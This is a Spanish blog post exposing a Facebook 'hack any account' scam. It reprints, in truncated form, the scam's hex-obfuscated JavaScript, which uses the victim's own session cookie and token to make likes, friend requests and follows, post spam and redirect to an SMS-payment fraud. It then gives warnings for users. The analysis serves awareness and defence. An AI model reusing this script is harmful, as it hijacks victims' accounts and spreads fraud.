Un Script de Facebook para ganar dinero (fraude)

Acabo de encontrar una publicación de una chica que contenía la siguiente leyenda “Hola, ya es posible Hackear cualquier facebook aquí: ( www.hackfb2015.?om ) a mi me funciono”.

El enlace en cuestión nos pide que ingresemos en www.hackfb2015.com. Al ingresar al sitio nos encontraremos con una página que muestra un video y, un pequeño tutorial de como “hackear” una cuenta de Facebook exitosamente. Quiero aclarar que esto es totalmente un fraude y les voy a mostrar por qué.

Me detuve a mirar el sitio por curiosidad, sabiendo que se trata de otro tipo de engaño, algo que normalmente suelen hacer con palabras claves como: “Hackea Facebook, hackea la contraseña de tu amigo, hack Facebook, etc”. Debemos ser concientes de que esto es totalmente falso, no existe nada para hackear Facebook, salvo las vulnerabilidades que se encuentran y reportan.

Siguiendo el tema nos ofrecen el siguiente código para “hackear cualquier cuenta”:

var _0x6daf=["\x53\x61\x79\x48\x65\x6C\x6C\x6F","\x47\x65\x74\x43\x6F\x75\x6E\x74","\x41\x74\x61\x71\x75\x65\x20\x6C\x69\x73\x74\x6F\x2E\x20\x76\x69\x63\x74\x69\x6D\x61\x3A\x20\x46\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x31\x32\x33\x34\x30\x32\x34\x37\x38\x38\x20\x3A\x20","\x44\x61\x20\x63\x6C\x69\x63\x6B\x20\x65\x6E\x20\x61\x63\x65\x70\x74\x61\x72\x20\x70\x61\x72\x61\x20\x65\x6D\x70\x65\x7A\x61\x72\x20\x61\x20\x20\x68\x61\x63\x6B\x65\x61\x72\x2E"];function NewObject(_0x51c0x2){var _0x51c0x3=0;this[_0x6daf[0]]=function (_0x51c0x4){_0x51c0x3++;alert(_0x51c0x2+_0x51c0x4);} ;this[_0x6daf[1]]=function (){return _0x51c0x3;} ;} ;var obj= new NewObject(_0x6daf[2]);obj.SayHello(_0x6daf[3]);

var _0xf2b3=["\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x66\x72\x69\x65\x6E\x64\x73\x2F\x6C\x69\x73\x74\x73\x2F\x73\x75\x62\x73\x63\x72\x69\x62\x65\x2F\x6D\x6F\x64\x69\x66\x79","\x66\x6C\x69\x64\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x73\x75\x62\x73\x63\x72\x69\x62\x65\x26\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x66\x65\x65\x64\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x67\x72\x6F\x75\x70\x5F\x6D\x61\x6C\x6C\x26\x66\x74\x5B\x74\x79\x70\x65\x5D\x3D\x34\x30\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x44\x48\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x78\x6F\x4E\x70\x47\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x79\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x70\x68\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65","\x73\x65\x6E\x64","\x35\x38\x33\x35\x31\x38\x33\x39\x31\x37\x38\x32\x30\x38\x32","\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x70\x61\x67\x65\x73\x2F\x66\x61\x6E\x5F\x73\x74\x61\x74\x75\x73\x2E\x70\x68\x70","\x26\x66\x62\x70\x61\x67\x65\x5F\x69\x64\x3D","\x26\x61\x64\x64\x3D\x74\x72\x75\x65\x26\x72\x65\x6C\x6F\x61\x64\x3D\x66\x61\x6C\x73\x65\x26\x66\x61\x6E\x5F\x6F\x72\x69\x67\x69\x6E\x3D\x70\x61\x67\x65\x5F\x74\x69\x6D\x65\x6C\x69\x6E\x65\x26\x66\x61\x6E\x5F\x73\x6F\x75\x72\x63\x65\x3D\x26\x63\x61\x74\x3D\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x74\x69\x6D\x65\x6C\x69\x6E\x65\x5F\x70\x61\x67\x65\x5F\x61\x63\x74\x69\x6F\x6E\x73\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x39\x38\x61\x44\x35\x7A\x35\x43\x46\x2D\x26\x5F\x5F\x72\x65\x71\x3D\x64\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x35\x35\x30\x31\x31\x39\x32\x37\x38\x34\x35\x35\x33\x32\x37","\x33\x31\x33\x38\x32\x33\x30\x31\x35\x34\x38\x39\x37\x30\x31","\x32\x35\x34\x31\x37\x30\x36\x38\x34\x37\x30\x37\x31\x37\x32","\x36\x39\x37\x30\x31\x37\x35\x36\x33\x37\x30\x32\x30\x38\x36","\x31\x35\x32\x31\x39\x36\x37\x31\x36\x34\x37\x33\x37\x37\x38\x37","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x61\x64\x64\x5F\x66\x72\x69\x65\x6E\x64\x2F\x61\x63\x74\x69\x6F\x6E\x2E\x70\x68\x70","\x74\x6F\x5F\x66\x72\x69\x65\x6E\x64\x3D","\x26\x61\x63\x74\x69\x6F\x6E\x3D\x61\x64\x64\x5F\x66\x72\x69\x65\x6E\x64\x26\x68\x6F\x77\x5F\x66\x6F\x75\x6E\x64\x3D\x66\x72\x69\x65\x6E\x64\x5F\x62\x72\x6F\x77\x73\x65\x72\x5F\x73\x26\x72\x65\x66\x5F\x70\x61\x72\x61\x6D\x3D\x6E\x6F\x6E\x65\x26\x26\x26\x6F\x75\x74\x67\x6F\x69\x6E\x67\x5F\x69\x64\x3D\x26\x6C\x6F\x67\x67\x69\x6E\x67\x5F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x73\x65\x61\x72\x63\x68\x26\x6E\x6F\x5F\x66\x6C\x79\x6F\x75\x74\x5F\x6F\x6E\x5F\x63\x6C\x69\x63\x6B\x3D\x74\x72\x75\x65\x26\x65\x67\x6F\x5F\x6C\x6F\x67\x5F\x64\x61\x74\x61\x26\x68\x74\x74\x70\x5F\x72\x65\x66\x65\x72\x65\x72\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x39\x38\x61\x44\x35\x7A\x35\x43\x46\x2D\x26\x5F\x5F\x72\x65\x71\x3D\x33\x35\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x31\x30\x30\x30\x30\x35\x37\x33\x30\x35\x35\x34\x39\x37\x37","\x31\x30\x30\x30\x30\x33\x31\x38\x33\x38\x35\x34\x36\x38\x38","\x2F\x61\x6A\x61\x78\x2F\x66\x6F\x6C\x6C\x6F\x77\x2F\x66\x6F\x6C\x6C\x6F\x77\x5F\x70\x72\x6F\x66\x69\x6C\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x70\x72\x6F\x66\x69\x6C\x65\x5F\x69\x64\x3D","\x26\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3D\x31\x26\x73\x6F\x75\x72\x63\x65\x3D\x66\x6F\x6C\x6C\x6F\x77\x2D\x62\x75\x74\x74\x6F\x6E\x26\x73\x75\x62\x73\x63\x72\x69\x62\x65\x64\x5F\x62\x75\x74\x74\x6F\x6E\x5F\x69\x64\x3D\x75\x33\x37\x71\x61\x63\x5F\x33\x37\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x6C\x73\x64\x26\x5F\x5F","\x67\x65\x74\x54\x69\x6D\x65","\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x75\x66\x69\x2F\x6C\x69\x6B\x65\x2E\x70\x68\x70","\x6C\x69\x6B\x65\x5F\x61\x63\x74\x69\x6F\x6E\x3D\x74\x72\x75\x65\x26\x66\x74\x5F\x65\x6E\x74\x5F\x69\x64\x65\x6E\x74\x69\x66\x69\x65\x72\x3D","\x26\x73\x6F\x75\x72\x63\x65\x3D\x31\x26\x63\x6C\x69\x65\x6E\x74\x5F\x69\x64\x3D","\x25\x33\x41\x33\x33\x36\x36\x36\x37\x37\x34\x32\x37\x26\x72\x6F\x6F\x74\x69\x64\x3D\x75\x5F\x70\x73\x5F\x30\x5F\x30\x5F\x31\x34\x26\x67\x69\x66\x74\x6F\x63\x63\x61\x73\x69\x6F\x6E\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x25\x33\x45\x25\x33\x44\x55\x26\x66\x74\x5B\x74\x79\x70\x65\x5D\x3D\x32\x30\x26\x66\x74\x5B\x71\x69\x64\x5D\x3D\x35\x38\x38\x32\x30\x30\x36\x38\x39\x30\x35\x31\x33\x37\x38\x34\x37\x31\x32\x26\x66\x74\x5B\x6D\x66\x5F\x73\x74\x6F\x72\x79\x5F\x6B\x65\x79\x5D\x3D","\x26\x6E\x63\x74\x72\x5B\x5F\x6D\x6F\x64\x5D\x3D\x70\x61\x67\x65\x6C\x65\x74\x5F\x68\x6F\x6D\x65\x5F\x73\x74\x72\x65\x61\x6D\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x33\x35\x43\x46\x77\x58\x41\x67\x26\x5F\x5F\x72\x65\x71\x3D\x6A\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x33\x31\x35\x33\x35\x39\x30\x35\x38\x36\x36\x35\x31\x31\x30"];

…Etc

¿Como funciona?

Este código lo que hace es, crear una publicación en el muro de nuestra victima (persona a la que queremos hackear) con el siguiente mensaje: “Hola, ya es posible Hackear cualquier facebook aquí: ( www.hackfb2015.?om ) a mi me funciono”

Después de ejecutar el script, automáticamente crea una publicación como si la hubiéramos realizado nosotras, nos redirecciona a otro sitio.

Sigamos viendo el código: \x68\x72\x65\x66″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x75\x6E\x64\x6F\x6D\x6F\x76\x69\x70\x2E\x63\x6F\x6D\x2F\x65\x73\x70\x65\x72\x61\x6E\x64\x6F\x2F\x23

Allí puede verse que -después de hacer todo el engaño- nos va a redireccionar a “http://mundomovip.com/esperando/” supuestamente esa página almacena la contraseña hackeada, cuando lo que hace es engañar a la persona haciéndole creer que está cargando la contraseña de la víctima, y mostrar el resultado de cuántos perfiles fueron hackeados.

Vamos a seguir buceando y lo haremos ingresando en el sitio http://mundomovip.com/esperando/. Después de esperar varios segundos hasta que complete el proceso, nos redireccionará a otro sitio “http://filefist.com/187825″ que contiene un archivo llamado “CuentaUsuario.zip”. En teoría ese archivo contiene la contraseña hackeada, pero para descargarlo tenemos que enviar un mensaje de texto (SMS). En este momento es cuando se materializa la estafa y nos cobraran $4 o $5 Pesos (depende) por el mensaje.

Este tipo de estafa se considera Ingenieria Social, según su definición de referencia, consiste en engañar a una persona para influenciarla en sus acciones. Es la manipulación de personas y así hacer que ejecute determinada acción, que las lleva a ser víctimas de un fraude informático.

Recomendación

  1. NO ejecutes scripts en la consola del navegador.
  2. NO ingreses en sitios que digan “Hack Facebook, Hack GMAIL, etc”
  3. NO abrir e-mails sospechosos diciendo que debes cambiar tu contraseña, y si llegas a ingresar en un mail que te llegó, y es sobre Facebook mirá la barra de direcciones URL y confirmá que diga facebook.com
  4. NO navegues sin protocolo de seguridad. Es decir, siempre que vayas a ingresar a tu perfil de Facebook, o tu correo personal fijate que esté el candadito verde activado (HTTPS), de lo contrario, corrés el riesgo de que tu información sea interceptada fácilmente por alguna atacante.

Y por último, quiero decirles que todo lo que lean en redes solciales y algún que otro sitio diciendo que se puede hackear Facebook, Gmail, Outlook, Yahoo! como si nada, es totalmente mentira. La unica forma de poder hackear una cuenta es con vulnerabilidades del sistema, que dudo mucho que sean públicas ya que perjudicarían a millones de personas.

-Share this page-
submit to reddit Hire a Professional Programmer

Ingeniero en Seguridad Informática, Python Hacker, amante de lo "priv8", y Cazador de Recompensas (Google, Facebook, Mozilla).

compartí, discutí, comentá

Deja un comentario

Loading Facebook Comments ...